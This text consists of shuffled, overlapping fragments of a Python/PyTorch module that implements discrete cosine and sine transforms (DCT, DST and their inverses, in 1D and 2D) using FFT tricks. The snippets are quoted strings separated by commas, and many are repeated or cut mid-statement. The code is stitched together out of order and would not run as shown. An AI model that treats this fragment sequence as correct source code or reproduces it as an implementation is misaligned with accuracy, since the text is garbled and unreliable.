Perform IFFT 4.", "def idct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation", "dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idcst2(x, expk_0=None, expk_1=None):", "torch.nn.functional as F import pdb \"\"\" Discrete spectral transformation leveraging", "# import os import sys import numpy as np import", "@date Jun 2018 # import os import sys import numpy", "in the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by 2*exp(1j*pi*u/(2N)) 2.", "idct_2N(x, expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation without normalization", "if len(x.size()) == 1: y.squeeze_(0) return y def idxt(x, cos_or_sin_flag,", "MxN @param expk_0 with length M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with", "x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N) z = torch.empty_like(x)", "0, expk_1) def idsct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse", "None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N))", "that [a, b, c, d, e, f] becomes [a, c,", "Sine-Cosine Transformation without normalization to coefficients. It computes following equation,", "def idcst2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Cosine-Sine", "Discrete Sine-Cosine Transformation without normalization to coefficients. It computes following", "@param perm1 with length N @param expk1 with length N", "+ v*j/N))). By mapping the original image from (i, j)", "with length N, 2*exp(-1j*pi*k/(2N)) ''' return idct_N(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1),", "+ sin(a-b)) cos(a) sin(b) = 1/2 * (sin(a-b) - sin(a+b))", "Discrete Cosine-Sine Transformation without normalization to coefficients. Compute idct(idxst(x)). @param", "<= 1: x_reorder = x.view([1, N]) else: x_reorder = x.clone()", "dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None): \"\"\" Batch", "expk=expk1) def idct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine", "perm = torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1] = torch.arange(0, N, 2,", "y_u = \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements the 2N padding trick", "# pad second last dimension, excluding the complex number dimension", "with length N @param expk1 with length N \"\"\" return", "properties. The trigonometric identities exploited by prosthaphaeresis relate products of", "Compute idct(idxst(x)). @param x batch tensor, the 2D part is", "= x.unsqueeze(-1).mul(expk) # pad second last dimension, excluding the complex", "such that [a, b, c, d, e, f] becomes [a,", "= torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :] if expkp1 is", "signal_sizes=[2*N])[..., 1:N+1] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y", "= torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype,", "expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # get imag part y", "y.squeeze_(0) return y def idxt(x, cos_or_sin_flag, expk=None): \"\"\" Batch Inverse", "2D part is MxN @param perm0 with length M @param", "cos(a+b)) sin(a) cos(b) = 1/2 * (sin(a+b) + sin(a-b)) cos(a)", "generate following array 0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3,", "Compute y_u = \\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements the 2N padding", "2*exp(-1j*pi*u/(2N)) 4. 
Extract the real part \"\"\" # last dimension", "pik_by_2N.mul_(np.pi/(2*N)) # cos, sin # I use sin because the", "the 2D part is MxN @param perm0 with length M", "''' Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to", "numbers introduce a new dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False,", "multiply 0.25 x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N) z", "device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device) return perm", "Sine Transformation without normalization to coefficients. Compute y_u = \\sum_i", "\"\"\" # last dimension N = x.size(-1) if perm is", "(0, 0, 0, N), 'constant', 0) if len(x.size()) == 1:", "column-major for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[..., perm, :]", "None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # get imag part", "N-j), we can have (u*i/M - v*j/N) inside exp. This", "M @param perm1 with length N @param expk1 with length", "return y def idct_N(x, expk=None): N = x.size(-1) if expk", "j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M +", "x.size(-1) if expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)", "v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D", "2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) def", "idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2,", "torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N) z = torch.empty_like(x) z[..., 0:N:2] =", "dimension N = x.size(-1) # pad last dimension x_pad =", "part \"\"\" # last dimension N = x.size(-1) if expkp1", "get_expkp1(N, dtype=x.dtype, device=x.device) # get imag part y = y[...,", "discrete_spectral_transform.py # @author <NAME> # @date Jun 2018 # import", "import os import sys import numpy as np import torch", "expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device) # multiply", "# last dimension N = x.size(-1) # pad last dimension", "to coefficients. Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the", "get_perm(N, dtype=torch.int64, device=x.device) if x.ndimension() <= 1: x_reorder = x.view([1,", "None: expk = get_expk(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N))", "array 0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3,", "device): \"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)), but not exactly the same. The", "1: y.squeeze_(0) return y def idct_N(x, expk=None): N = x.size(-1)", "expk_1) def idxst_idct(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete", "to coefficients. Compute y_u = \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements the", "M @param expk0 with length M @param perm1 with length", "normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0)", "def idst(x, expkp1=None): \"\"\" Batch Inverse Discrete Sine Transformation without", "much faster than sum #y = y.sum(dim=-1) return y[..., 0]+y[...,", "2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x,", "+ cos(a+b)) sin(a) cos(b) = 1/2 * (sin(a+b) + sin(a-b))", "dim1=-1), expk1) def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None): \"\"\" Batch", "is MxN @param perm0 with length M @param expk0 with", "+ v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))). 
By mapping the", "# I found add is much faster than sum #y", "@param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0,", "# last dimension N = x.size(-1) if expk is None:", "Cosine-Sine Transformation without normalization to coefficients. Compute idct(idxst(x)). @param x", "pad last dimension x_pad = F.pad(x, (0, N), 'constant', 0)", "expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1,", "x_reorder[..., 1].add_(x.mul(expk[..., 1])) # this is to match idct_2N #", "expk1 with length N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1),", "new dimension # Must use IFFT here y = torch.ifft(x_pad,", "j * sin(pi*u/(2N)) pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) #", "0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[...,", "= get_expk(N, dtype=x.dtype, device=x.device) size = list(x.size()) size.append(2) x_reorder =", "= torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :] y.mul_(1.0/N) if expk", "Cosine-Sine Transformation without normalization to coefficients. It computes following equation,", "sin # I use sin because the real part requires", "pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_expkp1(N, dtype, device): \"\"\"", "FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x by", "which is slightly different from standard DCT formulation. y_{u, v}", "image from (i, j) to (i, N-j), we can have", "x.unsqueeze(-1).mul(expkp1) # pad second last dimension, excluding the complex number", "N]) else: x_reorder = x.clone() # switch from row-major to", "0:N, :] y.mul_(1.0/N) if expk is None: expk = get_expk(N,", "torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk = torch.stack([pik_by_2N.cos(),", "various cos/sin transformation by computing FFT twice. \"\"\" def get_expk(N,", "z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z def dst(x,", "the real part \"\"\" # last dimension N = x.size(-1)", "y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the 2N padding trick", "trick to solve DCT with FFT in the following link,", ":] if expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)", "\"\"\" perm = torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1] = torch.arange(0, N,", "x_pad = x.unsqueeze(-1).mul(expk) # pad second last dimension, excluding the", "then 1D DST. @param x batch tensor, the 2D part", "Perform IFFT 4. Extract the real part @param x batch", "# cos, sin # I use sin because the real", "Jun 2018 # import os import sys import numpy as", "perm = get_perm(N, dtype=torch.int64, device=x.device) if x.ndimension() <= 1: x_reorder", "pdb \"\"\" Discrete spectral transformation leveraging fast fourier transform engine.", "with FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute x", "N), 'constant', 0) if len(x.size()) == 1: x_pad.unsqueeze_(0) # the", "Inverse Discrete Cosine-Sine Transformation without normalization to coefficients. 
Compute idct(idxst(x)).", "permuting trick to solve DCT with FFT in the following", ":] x_reorder = x_reorder.index_select(dim=-2, index=perm) # switch back x_reorder.transpose_(dim0=-2, dim1=-1)", "to solve IDCT with IFFT in the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py", "x batch tensor, the 2D part is MxN @param perm0", "get_expk(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not exactly the", "= \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT", "= \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j", "multiplication easier. \"\"\" pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) #", "expk1) def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None): \"\"\" Batch 2D", "dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()],", "part y.mul_(expk) # I found add is much faster than", "1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[..., 1])) # this is to match", ":N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[...,", "= x.view([1, N]) else: x_reorder = x.clone() # switch from", "device=device) perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype, device=device) perm[(N-1)//2+1:] =", "torch.arange(1, N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos # I", "\"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not exactly the same. The actual", "us to derive various cos/sin transformation by computing FFT twice.", "cos(pi/N*q*(v+0.5)) Compute 1D DST and then 1D DCT. @param x", "torch.arange(0, N, 2, dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2,", "x batch tensor, the 2D part is MxN @param expkp1_0", "coefficients. Compute 1D DCT twice. @param x batch tensor, the", "dim1=-1), 0, expk_1) def idsct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D", "y_u = \\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements the 2N padding trick", "x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M", "return expk.contiguous() def get_exact_expk(N, dtype, device): # Compute exp(-j*pi*u/(2N)) =", "cos(pi*(2i+1)*u/(2N)), Impelements the 2N padding trick to solve DCT with", "dim1=-1) #x_reorder = x_reorder[..., perm, :] x_reorder = x_reorder.index_select(dim=-2, index=perm)", "idct(idxst(x)). @param x batch tensor, the 2D part is MxN", "following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. 
permute x such that [a, b,", "import sys import numpy as np import torch import torch.nn.functional", "len(x.size()) == 1: x_pad.unsqueeze_(0) # the last dimension here becomes", "exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N)) =", "0]+y[..., 1] def dct_N(x, perm=None, expk=None): \"\"\" Batch Discrete Cosine", "multiplication expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def", "x_reorder.transpose_(dim0=-2, dim1=-1) y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :]", "import numpy as np import torch import torch.nn.functional as F", "\\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT and then", "dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)", "expk_0).transpose(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0,", "z = torch.empty_like(x) z[..., 0:N:2] = y[..., :(N+1)//2, 0] z[...,", "Discrete Sine Transformation without normalization to coefficients. Compute 1D DST", "-2 because complex numbers introduce a new dimension y =", "\\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i, j}", "N = x.size(-1) # pad last dimension x_pad = F.pad(x,", "q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DCT twice. @param x batch", "return y[..., 0]+y[..., 1] def idct_2N(x, expk=None): \"\"\" Batch Inverse", "1D tensor for conversion @param cos_or_sin_flag 0 for cosine tranformation", "0 for cosine tranformation and 1 or sine transformation @param", "swap -cos and sin because we need the imag part", "= F.pad(x_pad, (0, 0, 0, N), 'constant', 0) if len(x.size())", "Inverse Discrete Sine-Cosine Transformation without normalization to coefficients. It computes", "dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2,", "y[..., 0].mul(expkp1[:, 1]) return y def idst(x, expkp1=None): \"\"\" Batch", "j} (cos(-2*pi*(u*i/M + v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))). By", "2, dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device)", "= torch.arange(1, N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos #", "to coefficients. Compute 1D DST twice. @param x batch tensor,", "neg_pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_exact_expk(N, dtype, device): #", "return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). 
This will make later multiplication easier.", "signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :] y.mul_(1.0/N) if expk is None:", "# get imag part y = y[..., 1].mul(expkp1[:, 0]) -", "idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dst2(x, expkp1_0=None, expkp1_1=None): \"\"\"", "original image from (i, j) to (i, N-j), we can", "dim1=-1), expk1) def dst2(x, expkp1_0=None, expkp1_1=None): \"\"\" Batch 2D Discrete", "length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0,", "def get_perm(N, dtype, device): \"\"\" Compute permutation to generate following", "= 1/2 * (cos(a-b) + cos(a+b)) sin(a) cos(b) = 1/2", "0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[..., 1])) #", "dct_N(x, perm=None, expk=None): \"\"\" Batch Discrete Cosine Transformation without normalization", "dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N)", "Extract the real part \"\"\" # last dimension N =", "return y def dct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete", "faster than sum #y = y.sum(dim=-1) return y[..., 0]+y[..., 1]", "FFT performs y_{u, v} = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M)", "dtype=dtype, device=device) return perm def dct_2N(x, expk=None): \"\"\" Batch Discrete", "idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2,", "of trigonometric functions to sums. sin(a) sin(b) = 1/2 *", "a new dimension # Must use IFFT here y =", "dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2,", "dimension N = x.size(-1) if perm is None: perm =", "dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None): \"\"\"", "Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j * sin(pi*u/(2N)) pik_by_2N =", "cos/sin transformation by computing FFT twice. \"\"\" def get_expk(N, dtype,", "slightly different from standard DCT formulation. y_{u, v} = \\sum_p", "@param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2,", "Pad x by zeros 3. Perform IFFT 4. Extract the", "torch import torch.nn.functional as F import pdb \"\"\" Discrete spectral", "return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def idct2_N(x, expk0=None, expk1=None):", "y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z def dst(x, expkp1=None): \"\"\" Batch", "the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x by zeros 2.", "coefficients. Compute idxst(idct(x)) @param x batch tensor, the 2D part", "is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype, device=device)", "* (cos(a-b) - cos(a+b)) cos(a) cos(b) = 1/2 * (cos(a-b)", "actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1, N+1,", "dst2(x, expkp1_0=None, expkp1_1=None): \"\"\" Batch 2D Discrete Sine Transformation without", "IFFT 4. Extract the real part @param x batch 1D", "2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idct_N(idxt(x,", "transformation by computing FFT twice. 
\"\"\" def get_expk(N, dtype, device):", "we need the imag part # this will be easier", "sum #y = y.sum(dim=-1) return y[..., 0]+y[..., 1] def dct_N(x,", "y def idst(x, expkp1=None): \"\"\" Batch Inverse Discrete Sine Transformation", "x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[...,", "torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1) return expk.contiguous() def get_perm(N, dtype, device): \"\"\"", "dim=-1) expk.mul_(2) return expk.contiguous() def get_expkp1(N, dtype, device): \"\"\" Compute", "= list(x.size()) size.append(2) x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[..., 0]", "part \"\"\" # last dimension N = x.size(-1) if expk", "subtraction # this will be easier for multiplication expk =", "2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expkp1) # pad second last dimension, excluding", "IFFT 4. Extract the real part \"\"\" # last dimension", "perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1,", "return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idsct2(x,", "expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device) # get", "expk_0 with length M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with length N,", "dimension N = x.size(-1) if expkp1 is None: expkp1 =", "x_i cos(pi*(2i+1)*u/(2N)), Impelements the N permuting trick to solve DCT", "expk1 with length N \"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1),", "@param perm0 with length M @param expk0 with length M", "1D DCT. @param x batch tensor, the 2D part is", "exp. This will enable us to derive various cos/sin transformation", "length M @param expk1 with length N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2,", "y.sum(dim=-1) return y[..., 0]+y[..., 1] def dct_N(x, perm=None, expk=None): \"\"\"", "formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5))", "import torch.nn.functional as F import pdb \"\"\" Discrete spectral transformation", "Compute permutation to generate following array 0, 2, 4, ...,", "0].flip([x.ndimension()-1]) return z def dst(x, expkp1=None): \"\"\" Batch Discrete Sine", "v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D", "1:N+1] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y def", "onesided=True)[..., 1:N+1, :] if expkp1 is None: expkp1 = get_expkp1(N,", "batch tensor, the 2D part is MxN @param perm0 with", "0) # the last dimension here becomes -2 because complex", "x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[..., perm, :] x_reorder = x_reorder.index_select(dim=-2,", "cos, sin # I use sin because the real part", "IDCT with IFFT in the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply", "performs y_{u, v} = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N)", "Batch 2D Discrete Cosine Transformation without normalization to coefficients. Compute", "x.unsqueeze(-1).mul(expk) # pad second last dimension, excluding the complex number", "expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def idxst_idct(x, expk_0=None, expk_1=None): ''' Batch", "2*sin(pi*u/(2N)). This will make later multiplication easier. 
\"\"\" pik_by_2N =", "MxN @param expkp1_0 with length M @param expkp1_1 with length", "length N, 2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2,", "idxst(idct(x)) @param x batch tensor, the 2D part is MxN", "= x.size(-1) # pad last dimension x_pad = F.pad(x, (0,", "(cos(-2*pi*(u*i/M + v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))). By mapping", "expk_1=None): ''' Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization", "tranformation and 1 or sine transformation @param expk 2*exp(j*pi*k/(2N)) \"\"\"", "following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by 2*exp(1j*pi*u/(2N)) 2. Pad x", "# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def", "neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos # I swap -cos and sin", "idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def idct2_N(x, expk0=None, expk1=None): \"\"\"", "expk_0).transpose_(dim0=-2, dim1=-1) def idct_idxst(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse", "last dimension x_pad = F.pad(x, (0, N), 'constant', 0) #", "dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not exactly the same.", "Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the N permuting", "dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse", "new dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :]", "normalized=False, onesided=True)[..., 1:N+1, :] if expkp1 is None: expkp1 =", "(cos(a-b) - cos(a+b)) cos(a) cos(b) = 1/2 * (cos(a-b) +", "by 2*exp(-1j*pi*u/(2N)) 4. Extract the real part \"\"\" # last", "part requires subtraction # this will be easier for multiplication", "2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N))", "\\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i,", "to coefficients. It computes following equation, which is slightly different", "by 2*exp(1j*pi*u/(2N)) 2. Pad x by zeros 3. Perform IFFT", "\\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N)) = \\sum_i \\sum_j", "a new dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[...,", "return expk.contiguous() def get_perm(N, dtype, device): \"\"\" Compute permutation to", "new dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :]", "is MxN @param expkp1_0 with length M @param expkp1_1 with", "Batch Inverse Discrete Sine Transformation without normalization to coefficients. Compute", "expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation without normalization to", "\"\"\" Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to", "0, N), 'constant', 0) if len(x.size()) == 1: x_pad.unsqueeze_(0) #", "https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute x such that [a, b, c, d,", "return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype,", "https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by 2*exp(1j*pi*u/(2N)) 2. 
Pad x by zeros", "* (cos(a-b) + cos(a+b)) sin(a) cos(b) = 1/2 * (sin(a+b)", "is to match idct_2N # normal way should multiply 0.25", "Discrete Cosine-Sine Transformation without normalization to coefficients. It computes following", "new dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1]", "1: x_reorder = x.view([1, N]) else: x_reorder = x.clone() #", "Extract the real part @param x batch 1D tensor for", "torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_expkp1(N, dtype, device):", "expk0 with length M @param perm1 with length N @param", "here y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N) if", "should multiply 0.25 x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N)", "dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :] y.mul_(1.0/N)", "without normalization to coefficients. Compute y_u = \\sum_i x_i cos(pi*(2u+1)*i/(2N)),", "= get_expk(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N)) x_pad =", "real part @param x batch 1D tensor for conversion @param", "0:N:2] = y[..., :(N+1)//2, 0] z[..., 1:N:2] = y[..., (N+1)//2:,", "make later multiplication easier. \"\"\" pik_by_2N = torch.arange(N, dtype=dtype, device=device)", "part \"\"\" # last dimension N = x.size(-1) # pad", "2*(N//2)-1, 2*(N//2)-3, ..., 3, 1 \"\"\" perm = torch.zeros(N, dtype=dtype,", "dct_2N(x, expk=None): \"\"\" Batch Discrete Cosine Transformation without normalization to", "expk_1) def idcst2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete", "Transformation without normalization to coefficients. Compute idct(idxst(x)). @param x batch", "x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DCT twice. @param x", "if perm is None: perm = get_perm(N, dtype=torch.int64, device=x.device) if", "is MxN @param expk0 with length M 